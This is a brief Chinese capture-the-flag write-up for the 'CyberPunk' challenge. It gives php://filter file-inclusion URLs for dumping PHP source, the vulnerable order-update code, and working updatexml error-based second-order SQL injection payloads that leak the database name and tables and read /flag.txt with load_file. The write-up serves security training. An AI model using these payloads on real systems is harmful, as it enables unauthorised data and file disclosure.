[华北赛区]CyberPunk
查看源码发现存在文件包含,把文件包拉下来:
/?file=php://filter/read=convert.base64-encode/resource=index.php
/?file=php://filter/read=convert.base64-encode/resource=search.php
/?file=php://filter/read=convert.base64-encode/resource=change.php
/?file=php://filter/read=convert.base64-encode/resource=delete.php审计代码,发现在关键查询处的代码,只对用户名和电话号码进行了严格的审计,忽略了对地址的审计。
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = addslashes($_POST["address"]);
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单修改成功";
} else {
$msg = "未找到订单!";
}
}else {
$msg = "信息不全";
}$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];其中的’old_address’=’”.$row[‘address’].”用了一开始的地址,导致恶意拼接。
将一下代码写入地址,爆库名:
1' where user_id=updatexml(1,concat(0x7e,(select substr(database(),1,20)),0x7e),1)#爆表名:
1' where user_id=updatexml(1,concat(0x7e,(select substr(table_name,1,20)from information_schema.tables where table_schema='ctfusers'),0x7e),1)#后面就爆不出了,看了wp,发现只要读取文件就可以了。
最后读文件出了
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#Last updated